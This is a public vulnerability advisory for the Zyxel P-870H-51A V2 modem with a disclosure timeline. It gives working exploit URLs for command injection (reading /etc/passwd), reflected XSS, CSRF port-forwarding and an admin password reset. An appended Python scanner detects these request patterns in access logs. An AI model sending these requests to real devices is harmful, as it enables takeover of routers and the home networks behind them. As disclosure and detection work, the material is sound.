Vulnerability report: Zyxel P-870H-51A V2

January 11, 2015

This is a vulnerability report for the Zyxel P-870H-51A V2 ADSL2 modem (multiple vulnerabilities).

Technical specifications

  • Product: Zyxel P-870H-51A V2
  • Firmware: 1.01(AWZ.4)
  • Vulnerability type: cross-site request forgery, cross-site scripting, command injection

Disclosure timeline

  • 6th May 2014 - Contacted vendor (never received reply)
  • 28th May 2014 - Contacted NSCS-FI
  • 11th August 2014 - Received reply from NSCS-FI. They had contacted the vendor. The vendor had replied that the product is no longer supported and asked to make sure that the firmware was updated.
  • 12th January 2015 - Public disclosure

Remote Command Execution

Requires that the user is logged in. The command output is shown in the response. Can be exploited remotely as a CSRF vulnerability (however, the attacker then does not receive the output).

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20cat%20/etc/passwd&diagTestType=1

Since the default shell of the Linux distribution is very limited, it may be handy to run commands via sh:

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20sh%20-c%20ifconfig%20-a&diagTestType=1

Cross-site scripting

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi';alert('xss');//&diagTestType=1

Cross-site request forgery

Many actions can be performed, such as adding port forwarding rules to the internal network. Just redirect the victim to the following URL:

http://192.168.1.1/portForwarding.cmd?action=add&enableNAT=TRUE&srvName=asdf&dstWanIf=ptm0_1&srvAddr=192.168.1.123&wanIp=&proto=1,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,

Requests that trigger “change password” and “reboot” require a sessionKey parameter and thus cannot be forged. Wait, let’s see again. The device contains a non-standard Unix passwd command, which does not require the “current” password:

 > passwd

Usage: passwd <supervisor|admin|user> <password>
 passwd --help
 >

Hence, by combining this CSRF vulnerability and RCE, the attacker can remotely change the admin password:

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20passwd%20admin%20newpasswd
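For detection of the three request patterns above (command injection and XSS via diagAddr, and port-forwarding rules added by a cross-site request), here is an added example, not part of the original report, that scans web-server access log lines. It assumes a combined-format log export with a Referer field (constructed sample lines below; the P-870H itself may log differently) and that legitimate UI requests carry a Referer from the device's own origin.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log lines (Apache combined format) mirroring the report's URLs.
SAMPLE_LOG = """\
192.168.1.50 - - [11/Jan/2015:10:00:01 +0200] "GET /DiagGeneral.cgi?diagAddr=google.fi&diagTestType=1 HTTP/1.1" 200 512 "http://192.168.1.1/DiagGeneral.html" "Mozilla/5.0"
192.168.1.50 - - [11/Jan/2015:10:00:09 +0200] "GET /DiagGeneral.cgi?diagAddr=google.fi;%20cat%20/etc/passwd&diagTestType=1 HTTP/1.1" 200 1480 "http://evil.example/" "Mozilla/5.0"
192.168.1.50 - - [11/Jan/2015:10:00:12 +0200] "GET /DiagGeneral.cgi?diagAddr=google.fi';alert('xss');//&diagTestType=1 HTTP/1.1" 200 620 "-" "Mozilla/5.0"
192.168.1.50 - - [11/Jan/2015:10:00:20 +0200] "GET /portForwarding.cmd?action=add&enableNAT=TRUE&srvName=asdf&srvAddr=192.168.1.123 HTTP/1.1" 200 300 "http://evil.example/lure.html" "Mozilla/5.0"
192.168.1.50 - - [11/Jan/2015:10:00:25 +0200] "GET /portForwarding.cmd?action=add&enableNAT=TRUE&srvName=nas HTTP/1.1" 200 300 "http://192.168.1.1/portForwarding.html" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)
# A hostname or IP handed to the diagnostics page never needs any of these characters.
SHELL_META = re.compile(r"[;|&`$(){}<>'\"\\]")
DEVICE_ORIGIN = "http://192.168.1.1/"  # assumed management origin

def parse_query(query):
    """Split on '&' only, so ';' inside a value is kept for inspection."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def analyze(log_text):
    """Return (timestamp, rule, evidence) tuples for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["path"])
        params = parse_query(url.query)
        if url.path == "/DiagGeneral.cgi":
            for addr in params.get("diagAddr", []):
                if SHELL_META.search(addr):
                    findings.append((m["ts"], "diagAddr injection", addr))
        elif url.path == "/portForwarding.cmd" and params.get("action") == ["add"]:
            # A rule added from a page not served by the device points at CSRF.
            if not m["referer"].startswith(DEVICE_ORIGIN):
                findings.append((m["ts"], "port-forward add without device referer", m["referer"]))
    return findings

if __name__ == "__main__":
    for ts, rule, evidence in analyze(SAMPLE_LOG):
        print(ts, rule, repr(evidence))
```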
